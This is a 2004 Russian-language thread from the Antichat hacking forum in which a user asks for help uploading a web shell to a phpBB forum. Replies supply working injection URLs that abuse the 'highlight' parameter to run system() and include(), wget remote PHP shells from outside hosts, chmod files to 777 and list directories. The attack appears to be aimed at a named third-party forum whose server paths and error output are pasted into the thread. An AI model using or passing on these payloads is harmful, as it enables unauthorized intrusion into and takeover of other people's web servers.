Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Снова phpBB. Небольшой вопрос…(highlight) |
14.12.2004, 22:05
|
|
Познающий
Регистрация: 04.10.2004
Сообщений: 86
Провел на форуме:
424769
Репутация:
11
|
|
Снова phpBB. Небольшой вопрос…(highlight)
Не получается залить шелл. Я понимаю, что это звучит оооооочень глупо, но я уже не знаю, что делать… я уже все перепробовал… дело в том, что первый раз у меня получилось залить, но получилось не до конца… т.е. только половину файла ). На второй день уже нечего не получается залить… (. У меня настроение упало в несколько раз… сейчас сижу, голову ломаю, и думаю, где я мог проламерится…(… ну вроде все ж правильно…(
Просмотр директории, добавлять полные права, у меня выходит, а вот инклуд, или заливка, полный пи$%ец…
viewtopic.php?xxx=wget%20http://zattack.narod.ru/rem.php&t=10&highlight=%2527.include($_GET[xxx]).include.%2527
Ну ЧТО ТУТ НЕПРАВИЛЬНО??? Вить viewtopic.php?xxx=echo%20huitext&t=10&highlight=%2 527.include($_GET[xxx]).include.%2527 срабатывает…
ПЛЗ, очень прошу помогите разобраться в этой х%$@e...(
|
|
|
14.12.2004, 22:34
|
|
Участник форума
Регистрация: 19.07.2004
Сообщений: 135
Провел на форуме:
883817
Репутация:
112
|
|
попробуй так.
http://[Target]/viewtopic.php?p=44&highlight=%2527.$poster=pwd;ls% 20-l;wget%20http://docentattack.narod.ru/p.php
Последний раз редактировалось kyzmi4; 14.12.2004 в 22:37..
|
|
|
|
14.12.2004, 22:36
|
|
Участник форума
Регистрация: 11.12.2004
Сообщений: 242
Провел на форуме:
144460
Репутация:
39
|
|
как стать хацкером?
|
|
|
|
14.12.2004, 22:39
|
|
Участник форума
Регистрация: 19.07.2004
Сообщений: 135
Провел на форуме:
883817
Репутация:
112
|
|
Сообщение от SHiTS
как стать хацкером?
Это вопрос риторический. Для того что-бы немного разбиратя в этом всем.
Я прочитал книги:
Html;
css;
Linux;
PHP5;
Javascript.
Почитай =)
|
|
|
|
14.12.2004, 23:10
|
|
Познающий
Регистрация: 04.10.2004
Сообщений: 86
Провел на форуме:
424769
Репутация:
11
|
|
Сообщение от kyzmi4
попробуй так.
http://[Target]/viewtopic.php?p=44&highlight=%2527.$poster=pwd;ls% 20-l;wget%20http://docentattack.narod.ru/p.php
------------------------------------------
PHP код:
Parse error: parse error, unexpected ';' in /var/www/virtual/ua/com/kievnet/forum/htdocs/viewtopic.php(1109) : regexp code on line 1
Fatal error: preg_replace() [function.preg-replace]: Failed evaluating code: preg_replace('#\b('\.$poster\=pwd;ls|-l;wget|http\://zattack\.narod\.ru/zz\.php)\b#i', '<span style="color:#FFA34F"><b>\1</b></span>', '><') in /var/www/virtual/ua/com/kievnet/forum/htdocs/viewtopic.php on line 1109
Неее... фанарь... не работает (((
Последний раз редактировалось -SX-; 14.12.2004 в 23:29..
|
|
|
|
15.12.2004, 00:22
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131
Репутация:
47
|
|
Парень, ты наверное немного ошибся:
правильно будет так:
highlight=%2527.system($_GET[id]).%2527&id=wget url...
а ты пытаешься выпонить системную команду, когда сам пишешь include($_GET[xxx]) 
расскажи как ты добавляешь полные права...
.htaccess правишь что-ли? |
|
|
|
15.12.2004, 01:25
|
|
Познающий
Регистрация: 04.10.2004
Сообщений: 86
Провел на форуме:
424769
Репутация:
11
|
|
Сообщение от virgoz
Парень, ты наверное немного ошибся:
правильно будет так: viewtopic.php?t=1&highlight=%2527.system($_GET[id]).%2527&id=wget%20http://zattack.narod.ru/rem.php
а ты пытаешься выпонить системную команду, когда сам пишешь include($_GET[xxx]) Мля... все равно бага не пашет (
Сообщение от virgoz
расскажи как ты добавляешь полные права...
viewtopic.php?t=1&highlight=%2527.die(%60cd%09../;chmod%09777%09_FILE.php_;pwd;ls%09-l%60).%2527
|
|
|
|
15.12.2004, 19:50
|
|
Участник форума
Регистрация: 19.07.2004
Сообщений: 135
Провел на форуме:
883817
Репутация:
112
|
|
у тебя после wget стоит |
|
|
|
|
15.12.2004, 21:08
|
|
Познающий
Регистрация: 04.10.2004
Сообщений: 86
Провел на форуме:
424769
Репутация:
11
|
|
Сообщение от kyzmi4
у тебя после wget стоит |
???
...=wget%20ht...
дык. %20 это ж пробел...
Или я что-то не так понял...???
|
|
|
|
15.12.2004, 21:41
|
|
Познающий
Регистрация: 04.10.2004
Сообщений: 86
Провел на форуме:
424769
Репутация:
11
|
|
Вот вчера ночью заметил еще один вариант…
Решил попробовать… для начала ввел
viewtopic.php?t=26&sid=01e4a9e8bcccb0c6b19d5509d94 9ab55&highlight=%2527.$poster=`pwd`.%2527
Вылезло место нахождения форума… /var/www/virtual/ua/com/kievnet/forum/htdocs
Все, я такой радый, прям как слон, уверен в победе, ввожу
http://forum.kievnet.com.ua/viewtopic.php?t=26&sid=01e4a9e8bcccb0c6b19d5509d94 9ab55&highlight=%2527.$poster=`$cmd`.%2527&cmd=cd%20..;ls%20-l
. Т.е. чтоб передо мной высветился списочек файлов и их прав…
Место этого появилось )\b#i .
Ну этт вообще нормально???
Последний раз редактировалось -SX-; 15.12.2004 в 21:44..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
